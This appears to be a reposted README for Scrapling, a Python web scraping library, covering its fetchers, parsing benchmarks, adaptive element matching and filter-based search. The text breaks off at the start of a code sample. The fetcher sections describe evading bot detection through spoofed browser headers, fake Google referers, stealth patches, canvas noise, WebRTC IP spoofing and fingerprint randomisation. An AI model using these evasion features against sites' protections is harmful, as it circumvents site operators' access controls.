Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • 🔄 Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filter-based search, text search, regex search and more.
  • 🔍 Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling's powerful features.

High Performance

  • 🚀 Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • 🔋 Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚡ Fast JSON serialization: 10x faster than the standard library.

Developer Friendly

  • 🛠️ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that take less memory than standard dictionaries, with added methods.
  • 📝 Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • 🔌 Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • 📘 Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you can see, Scrapling is on par with Parsel/Scrapy and slightly faster than raw Lxml, the library that both Scrapling and Parsel are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml, yet Scrapling is still about 4 times faster.
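The "vs Scrapling" column is simply each library's time divided by Scrapling's time. A quick check of that arithmetic, using only the numbers from the table above (the variable names are mine):

```python
# Times in milliseconds, copied from the text-extraction table above.
times_ms = {
    "Scrapling": 5.44,
    "Parsel/Scrapy": 5.53,
    "Raw Lxml": 6.76,
    "PyQuery": 21.96,
    "Selectolax": 67.12,
    "BS4 with Lxml": 1307.03,
    "MechanicalSoup": 1322.64,
    "BS4 with html5lib": 3373.75,
}

baseline = times_ms["Scrapling"]
# Ratio of each library's time to the baseline, rounded like the table.
ratios = {name: round(t / baseline, 3) for name, t in times_ms.items()}

for name, ratio in ratios.items():
    print(f"{name:<18} {ratio}x")
```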

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods, and it returns full element Adaptor objects rather than only the text like AutoScraper does. So, to make this test fair, both libraries extract an element by its text, find similar elements, and then extract the text content of all of them. As you can see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
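For a feel of what "an average of 100 runs" means in practice, here is a minimal stdlib sketch. It is not the project's benchmarks.py; `average_ms` and `sample_task` are hypothetical names, and the workload is a stand-in you would replace with your own parsing call.

```python
import timeit

def average_ms(func, runs=100):
    """Return the mean wall-clock time of `func` in milliseconds over `runs` calls."""
    total_seconds = timeit.timeit(func, number=runs)
    return total_seconds / runs * 1000

def sample_task():
    # Stand-in workload; replace with the parsing call you want to measure.
    return sum(i * i for i in range(1000))

elapsed = average_ms(sample_task)
print(f"{elapsed:.3f} ms per run")
```

Averaging over many runs smooths out one-off noise from the OS scheduler or caches, which matters when the differences are fractions of a millisecond.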

Installation

Scrapling is a breeze to get started with. Starting from version 0.2.9, it requires at least Python 3.9.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries, with added features, that make requests or fetch pages for you in a single call and then return an Adaptor object. This feature was introduced because the only option before was to fetch the page yourself, then pass its source manually to the Adaptor class to create an Adaptor instance and start working with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

Note: The auto_match argument is enabled by default. It is the one you should care about the most, as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options. It lets you make GET, POST, PUT, and DELETE requests.

All methods accept stealthy_headers, which makes Fetcher generate and use a real browser's headers, then add a referer header as if the request came from a Google search for the URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods; this makes httpx retry a request if it fails for any reason. The default number of retries for all Fetcher methods is 3.

Note: Any header generated by the stealthy_headers argument can be overwritten through the headers argument.
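To picture what generated headers plus a caller override amount to, here is a minimal stdlib sketch. It is not Fetcher's actual code: the helper name `build_headers`, the placeholder User-Agent string, and the exact shape of the referer URL are all assumptions for illustration.

```python
from urllib.parse import urlsplit

def build_headers(url, headers=None):
    """Hypothetical helper: browser-like defaults plus a Google-search referer."""
    domain = urlsplit(url).hostname or ""
    generated = {
        # Placeholder value; a real implementation would generate a current browser UA.
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/120.0",
        # Assumed referer shape: a Google search for the target domain.
        "Referer": f"https://www.google.com/search?q={domain}",
    }
    # Caller-supplied headers win over generated ones.
    generated.update(headers or {})
    return generated

print(build_headers("https://httpbin.org/get", {"User-Agent": "my-bot/1.0"}))
```

Note that this sketch treats header names as case-sensitive dictionary keys, so an override only replaces a generated header when the spelling matches.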

You can route all traffic (HTTP and HTTPS) through a proxy for any of these methods, using this format: http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
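The proxy string packs the server address and the credentials into one URL. Here is a small stdlib sketch of how it breaks down; the helper name `split_proxy` is hypothetical, and the dictionary keys simply mirror the 'server', 'username', and 'password' keys that the browser-based fetchers accept for their proxy argument.

```python
from urllib.parse import urlsplit

def split_proxy(proxy_url):
    """Hypothetical helper: split a proxy URL into server and credentials."""
    parts = urlsplit(proxy_url)
    server = f"{parts.scheme}://{parts.hostname}"
    if parts.port is not None:
        server += f":{parts.port}"
    return {
        "server": server,
        "username": parts.username or "",
        "password": parts.password or "",
    }

print(split_proxy("http://username:password@localhost:8030"))
# {'server': 'http://localhost:8030', 'username': 'username', 'password': 'password'}
```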

For async requests, just replace the import as shown below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: by default, all requests made by this fetcher wait for all JS to be fully loaded and executed, so you don't have to :)

For the sake of simplicity, here is the complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | ✔️ |
| block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | ✔️ |
| block_webrtc | Blocks WebRTC entirely. | ✔️ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ |
| addons | List of Firefox addons to use. **Must be paths to extracted addons.** | ✔️ |
| humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | ✔️ |
| allow_webgl | Enabled by default. Disabling WebGL is not recommended as many WAFs now check if WebGL is enabled. | ✔️ |
| geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | ✔️ |
| disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | ✔️ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ |
| timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ |
| wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ |
| proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ |
| os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | ✔️ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
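As a rough illustration of the page_action argument, here is a sketch of a function with the shape the table describes: it takes the `page` object, does something with it, and returns it. I am assuming `page` is a Playwright-style page object, so `page.mouse.wheel(delta_x, delta_y)` is available; the function name `scroll_down` is hypothetical.

```python
def scroll_down(page):
    """Example page_action: scroll the page, then hand the same page object back."""
    # `page.mouse.wheel(delta_x, delta_y)` is Playwright's mouse-wheel call;
    # that `page` is a Playwright page here is an assumption.
    page.mouse.wheel(0, 1000)
    return page
```

You would then pass it by name, for example `StealthyFetcher().fetch('https://example.com', page_action=scroll_down)`.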

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: by default, all requests made by this fetcher wait for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:

  1. Vanilla Playwright without any modifications other than the ones you chose.
  2. Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
     • Patching the CDP runtime fingerprint.
     • Mimicking some of the real browsers' properties by injecting several JS files and using custom options.
     • Using custom flags on launch to hide Playwright even more and make it faster.
     • Generating a real browser's headers of the same type and same user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled on it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: Using the real_chrome argument requires that you have the Chrome browser installed on your device.

On top of that, there are many controlling/hiding options, as you will see in the arguments list below.

The complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | ✔️ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | ✔️ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ |
| timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ |
| wait_selector | Wait for a specific css selector to be in a specific state. | ✔️ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |
| google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | ✔️ |
| extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | ✔️ |
| proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ |
| hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | ✔️ |
| disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | ✔️ |
| stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | ✔️ |
| real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | ✔️ |
| locale | Set the locale for the browser if wanted. The default value is `en-US`. | ✔️ |
| cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | ✔️ |
| nstbrowser_mode | Enables NSTBrowser mode, **it has to be used with the `cdp_url` argument or it will get completely ignored.** | ✔️ |
| nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
    # do something with it...
    pass

You can also search for a specific ancestor of an element that satisfies a condition. All you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
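If the idea of "walk up until a function says yes" is new to you, here is the same pattern on a tiny document using only the standard library. This is a sketch of the concept, not Scrapling's implementation; the HTML snippet and the `parents` map are made up for the example (ElementTree has no parent pointers, so the map is built by hand).

```python
import xml.etree.ElementTree as ET

html = """
<div class="container">
  <div class="row">
    <div class="col-md-8">
      <div class="quote">text</div>
    </div>
  </div>
</div>
"""
root = ET.fromstring(html.strip())
# ElementTree has no parent pointers, so build a child -> parent map first.
parents = {child: parent for parent in root.iter() for child in parent}

def find_ancestor(element, predicate):
    """Walk upward and return the first ancestor for which predicate(ancestor) is true."""
    current = parents.get(element)
    while current is not None:
        if predicate(current):
            return current
        current = parents.get(current)
    return None

quote = root.find(".//div[@class='quote']")
row = find_ancestor(quote, lambda el: "row" in el.get("class", "").split())
print(row.get("class"))  # row
```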

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'£[\d\.]+') # Get the first element whose text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that match my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
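To give an intuition for "similar in location and attributes", here is a simplified stdlib sketch. It is only a mental model, not how Scrapling decides similarity: I assume "same location" means the same chain of tag names from the root, and "same attributes" means the same attribute names (minus any ignored ones). The HTML and the helper names are made up for the example.

```python
import xml.etree.ElementTree as ET

html = """
<ol>
  <li><h3><a href="a.html" title="A">A</a></h3></li>
  <li><h3><a href="b.html" title="B">B</a></h3></li>
  <li><h3><a href="c.html" title="C">C</a></h3></li>
  <li><p><a href="about.html">About</a></p></li>
</ol>
"""
root = ET.fromstring(html.strip())
parents = {child: parent for parent in root.iter() for child in parent}

def tag_path(element):
    """Tags from the root down to the element, e.g. ('ol', 'li', 'h3', 'a')."""
    path = []
    while element is not None:
        path.append(element.tag)
        element = parents.get(element)
    return tuple(reversed(path))

def find_similar(element, ignore_attributes=()):
    """Elements with the same tag path and attribute names, excluding `element` itself."""
    def attr_names(el):
        return {name for name in el.attrib if name not in ignore_attributes}
    return [
        other for other in root.iter(element.tag)
        if other is not element
        and tag_path(other) == tag_path(element)
        and attr_names(other) == attr_names(element)
    ]

first = root.find(".//a[@title='A']")
print([a.get("href") for a in find_similar(first)])
```

The "About" link is left out because it sits under a `p` instead of an `h3`, and, as in the example above, the starting element itself is never part of the result.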

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
...     print({
...         "name": product.css_first('h3 a::text'),
...         "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
...         "stock": product.css('.availability::text')[-1].clean()
...     })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element:  # One day website changes?
    element = page.css('#p1', auto_match=True)  # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
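As a rough mental model only (this is not Scrapling's actual algorithm, which the FAQs cover), you can think of it as saving a small record of the element while the selector still works, then later picking the element that looks most like that record. The stdlib sketch below runs that idea on the two HTML versions shown above; `fingerprint`, `similarity`, and the equal weighting of the three fields are my own assumptions.

```python
import xml.etree.ElementTree as ET
from difflib import SequenceMatcher

OLD = """<div class="container"><section class="products">
<article class="product" id="p1"><h3>Product 1</h3><p class="description">Description 1</p></article>
<article class="product" id="p2"><h3>Product 2</h3><p class="description">Description 2</p></article>
</section></div>"""

NEW = """<div class="new-container"><div class="product-wrapper"><section class="products">
<article class="product new-class" data-id="p1"><div class="product-info">
<h3>Product 1</h3><p class="new-description">Description 1</p></div></article>
<article class="product new-class" data-id="p2"><div class="product-info">
<h3>Product 2</h3><p class="new-description">Description 2</p></div></article>
</section></div></div>"""

def fingerprint(element):
    """Hypothetical 'saved' record: tag, attribute values, and all nested text."""
    return {
        "tag": element.tag,
        "attrs": " ".join(sorted(element.attrib.values())),
        "text": " ".join(t.strip() for t in element.itertext() if t.strip()),
    }

def similarity(saved, candidate):
    """Average string similarity across the fingerprint fields (0.0 to 1.0)."""
    current = fingerprint(candidate)
    scores = [SequenceMatcher(None, saved[k], current[k]).ratio() for k in saved]
    return sum(scores) / len(scores)

# "auto_save": record the element while the original selector still works.
saved = fingerprint(ET.fromstring(OLD).find(".//*[@id='p1']"))

# "auto_match": the id is gone, so pick the most similar element instead.
best = max(ET.fromstring(NEW).iter(), key=lambda el: similarity(saved, el))
print(best.tag, best.attrib)
```

Even though the `id` attribute disappeared and a wrapper `div` was added, the first product still scores highest because its tag, remaining attribute values, and text barely changed.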

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use the Internet Archive's Wayback Machine. Here is a copy of Stack Overflow's website in 2010, pretty old huh? Let's test if the auto-match feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions:

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
...     print('Scrapling found the same element in the old design and the new design!')
Scrapling found the same element in the old design and the new design!

Note that I used a new argument called automatch_domain. This is because, for Scrapling, these are two different URLs rather than one website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain we want to use for saving auto-match data for both of them, so Scrapling doesn't isolate them.
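One way to picture the isolation is as a storage key derived from the URL's host unless you override it. This is only a sketch of the idea; `storage_key` is a hypothetical helper and Scrapling's real storage layout may differ.

```python
from urllib.parse import urlsplit

def storage_key(url, automatch_domain=None):
    """Hypothetical: the key under which saved element data would be filed."""
    # An explicit domain overrides whatever host the URL happens to have.
    return automatch_domain or urlsplit(url).hostname

old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
new_url = "https://stackoverflow.com/"

# Without the override, the two pages are filed under different keys...
print(storage_key(old_url), storage_key(new_url))
# ...with it, both share one key, so data saved from one is visible to the other.
print(storage_key(old_url, "stackoverflow.com") == storage_key(new_url, "stackoverflow.com"))
```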

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class once and the Fetcher class once, just to show that you can either create the Adaptor object yourself if you have the source, or fetch the source using any Fetcher class, which creates the Adaptor object for you.
  2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in the auto_save argument value being ignored, along with the following warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the auto_match argument.
  3. The auto_match parameter works only for Adaptor instances, not Adaptors, so if you do something like page.css('body').css('#p1', auto_match=True) you will get an error, because you can't auto-match a whole list. You have to be specific and do something like page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function, you can find elements by using the find_all/find methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.

To be more specific:

  • Any string passed is considered a tag name.
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content.
  • Any functions passed are used as filters.
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
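The waterfall described above can be sketched in a few lines on top of the standard library. This is an illustration of the filtering order only, not Scrapling's find_all: it works on ElementTree elements, matches a regex against each element's own text, and treats an attribute as matching when the value is equal or is one of its space-separated tokens (my assumptions).

```python
import re
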